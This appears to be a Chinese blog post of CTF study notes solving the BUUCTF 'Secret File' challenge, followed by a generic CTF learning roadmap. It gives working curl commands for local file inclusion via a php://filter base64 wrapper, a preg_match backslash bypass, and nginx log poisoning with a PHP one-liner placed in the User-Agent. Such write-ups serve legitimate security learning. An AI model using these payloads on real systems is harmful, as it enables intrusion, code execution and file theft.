CTF学习记录(6.2)

绕过preg-match对flag过滤可以用\绕过,flag等同于f\l\a\gpreg绕过

BUUCTF-[极客大挑战 2019]Secret File1--好像可以用中国蚂剑--之后再搞

第一种:伪协议,一键获得

curl "http://fe888d52-46a9-4eb7-81e1-2ea5496cc3ac.node4.buuoj.cn:81/secr3t.php" --get --data "file=php://filter/read=convert.base64-encode/resource=flag.php"

第二种日志上传漏洞   日志上传漏洞的本质,好像是一句话木马。首先确认是什么服务器,可以输入1.php

然后

apache一般是/var/log/apache/access.log。:

nginx的log在/var/log/nginx/access.log和/var/log/nginx/error.log

 这些目录里面记录了我们访问过的日志(哪怕是错误访问)那么,我们就想要执行这些文件

当访问一个不存在的资源时,Apache日志同样会记录 例如访问http://127.0.0.1/<?php phpinfo();?>。Apache会记录请求“<?php phpinfo();?>”,并写到access.log文件中,这时候去包含access.log就可以利用包含漏洞

但并不能直接利用,原因是直接访问URL后,一句话木马在日志文件中被编码了 需要通过burpsuite拦截直接访问http://127.0.0.1/<?php phpinfo();?> 

先访问一次/var/log/nginx/access.log,确认能不能有日志上传漏洞,发现页面有显示,接下来就要在日志中输入错误

 然后再post

 

 最后在源代码找到flag-qwq

curl一键获得 get上传

curl "http://fe888d52-46a9-4eb7-81e1-2ea5496cc3ac.node4.buuoj.cn:81/secr3t.php?file=/var/log/nginx/access.log" --user-agent "<?php echo file_get_contents('flag.php')?>"
curl "http://cb91b2a3-ac7c-4ed3-8a34-0e779ce95ea1.node4.buuoj.cn:81/secr3t.php?file=/var/log/nginx/access.log" --user-agent "<?php echo file_get_contents('flag.php')?>" -s -o output.txt && findstr /R "flag{.*}" output.txt

改良版本

linux版本

curl 'http://4be38139-6ca1-4224-beb5-5266884e017e.node4.buuoj.cn:81/secr3t.php?file=/var/log/nginx/access.log' --user-agent "<?php echo file_get_contents('flag.php')?>" -s | grep '$flag' | uniq | sed 's/.*\(flag{.*}\).*/\1/'
curl 'http://4be38139-6ca1-4224-beb5-5266884e017e.node4.buuoj.cn:81/secr3t.php' --get --data 'file=php://filter/read=convert.base64-encode/resource=flag.php' -s | grep '</html>' | sed -n "s/.*>\([A-Za-z0-9+/]\+=\).*/\1/p" | base64 -d | grep flag | sed -n 's/.*\(flag{.*}\).*/\1/p'

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CTF(Capture The Flag)全称网络安全夺旗赛,是一种网络安全竞赛形式,参与者需要运用各种技能解决挑战,包括漏洞挖掘、密码学、取证分析等。学习 CTF 的路线可以分为三个阶段: 6.1 初期 - **入门基础**:首先,了解网络安全基础知识,如网络协议、操作系统原理、基本的漏洞类型(如缓冲区溢出、权限提升等)。熟悉基本的 Linux 命令行工具,如 `nc`、`grep`、`sed` 等,这些是基础操作。 - **编程语言**:掌握至少一种编程语言,如 Python 或 C/C++,用于编写自动化脚本或实现解密算法。 - **工具学习**:学习网络安全工具,如 Metasploit、Nmap、Wireshark 等,以及漏洞扫描和渗透测试框架。 - **基础知识挑战**:参加在线平台的入门级 CTF 比赛或练习题,了解比赛流程和基本策略。 6.2 中期 - **进阶技术**:深入学习特定领域的 CTF 技术,比如 Web 安全(SQL 注入、XSS、CSRF)、加密与密码学(AES、RSA、哈希函数)、二进制分析等。 - **渗透测试**:学习如何模拟攻击并防御,理解渗透测试框架 Kali Linux 的使用。 - **团队协作**:开始加入 CTF 团队,学习团队合作与信息共享,理解和使用工具进行团队配合。 - **参加比赛**:参加中等难度的 CTF 比赛,提升实战经验,并了解业界动态。 6.3 后期 - **研究与开发**:关注安全领域的新技术和漏洞,研究漏洞发掘和利用方法,参与漏洞报告和修复过程。 - **高级技术**:涉及高级安全领域,如供应链安全、零日攻击、云安全等,同时学习如何构建安全体系。 - **领导角色**:如果你有兴趣,可以向成为领队或教练发展,指导他人学习,或者创建自己的 CTF 题库。 - **持续学习**:网络安全是一个不断变化的领域,保持对新技术的关注和学习,如 AI 安全、物联网安全等。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值